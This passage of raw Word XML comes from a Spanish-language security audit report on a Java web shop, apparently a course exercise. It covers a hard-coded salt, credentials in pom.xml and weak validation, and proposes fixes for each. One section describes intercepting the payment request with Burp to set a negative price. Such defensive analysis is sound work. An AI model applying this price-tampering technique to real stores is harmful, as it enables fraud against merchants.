        <w:t xml:space="preserve">Desgraciadamente, esto no es fiable al 100%, pues es posible añadir un archivo con falsa extensión, como “.txt.jpg”, sería una buena práctica realizar mayores comprobaciones para evitar este suceso</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000224">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fxulb879lyqu" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use of Hard-coded Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000225">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>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CWE-798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El producto contiene credenciales codificadas en duro, como una contraseña o una clave criptográfica, que utiliza para su propia autenticación entrante, comunicación saliente con componentes externos o encriptación de datos internos.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Cambiar el uso de una variable estática por el método automático gensalt() que generará un salado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022C">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Como podemos ver en la siguiente captura, el salt está pregenerado, y se establece para todos los usuarios.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022E">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1231900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="32"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before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Podemos utilizar el propio BCrypt para generar un salado aleatorio (podríamos especificar un número de caracteres si así lo deseamos)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000230">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1384300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="59"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before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">También debemos cambiar esto en todos aquellos métodos que utilicen este hash predefinido</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000232">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Método “create”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000233">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1714500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="53"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before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">método “changePassword”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000235">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1638300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="17"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before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Al ver este método, podemos concluir que dará un error, esto es debido a que es necesario un cambio en la propia base de datos, pues al no utilizar un hash pregenerado, necesitamos tenerlo guardado individualmente por usuario. Los cambios necesarios incluirían:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000237">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Crear una nueva columna en la tabla usuarios de la base de datos donde almacenar cada salt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000238">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Crear un nuevo método para realizar una consulta sobre la base de datos para recuperar este salado y de esta forma poder cambiar la contraseña (o iniciar sesión; métodos login y changePassword)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000239">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_v0rspwt9x144" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Misconfiguration</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spacing w:before="240" w:line="240" w:lineRule="auto"/>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CVE-2023-22920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debido a una mala configuración predeterminada de fábrica destinada a fines de prueba. Un atacante remoto podría aprovechar esta vulnerabilidad para acceder a un dispositivo afectado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Eliminación de cualquier dato no deseado de las páginas correspondientes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000243">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000244">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000245">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000246">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000247">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Las credenciales de la base de datos deberían eliminarse del archivo pom.xml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000248">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="3213100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="44"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before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024A">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024B">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024C">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024E">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024F">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000250">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000251">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000252">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000253">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000254">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000255">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000256">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000257">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000258">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qfsdd7p4j6xc" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Insuficiencia de validación en el servidor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000259">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>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La validación de entrada es una técnica frecuentemente utilizada para comprobar las entradas potencialmente peligrosas con el fin de asegurarse de que sean seguras para su procesamiento dentro del código, o al comunicarse con otros componentes. Cuando el software no valida adecuadamente la entrada, un atacante puede manipularla de tal manera que no es esperada por el resto de la aplicación. Esto provocará que partes del sistema reciban entradas no deseadas, lo que puede resultar en un flujo de control alterado, control arbitrario de un recurso o ejecución arbitraria de código.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La validación de cualquier tipo de datos en el lado cliente debe ser meramente por mejorar la experiencia y en ningún caso debería utilizarse como seguridad, pues cualquier código o protocolo en el lado cliente puede ser cambiado. Sin embargo, las validaciones en el servidor no son tan fáciles de sortear y pueden evitar este tipo de problemas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000260">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000261">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000262">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000263">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000264">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000265">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000266">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000267">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000268">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000269">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Podemos utilizar burp o programas similares para interceptar en el momento de realizar el pago, dado que este valor es enviado, podemos cambiar este valor, e incluso ponerlo en negativo y la tienda nos debería dinero</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026A">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5424488" cy="3216847"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="64"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5424488" cy="32168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B">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026C">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="5514975"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1"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334000" cy="55149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D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026E">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026F">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000270">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000271">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
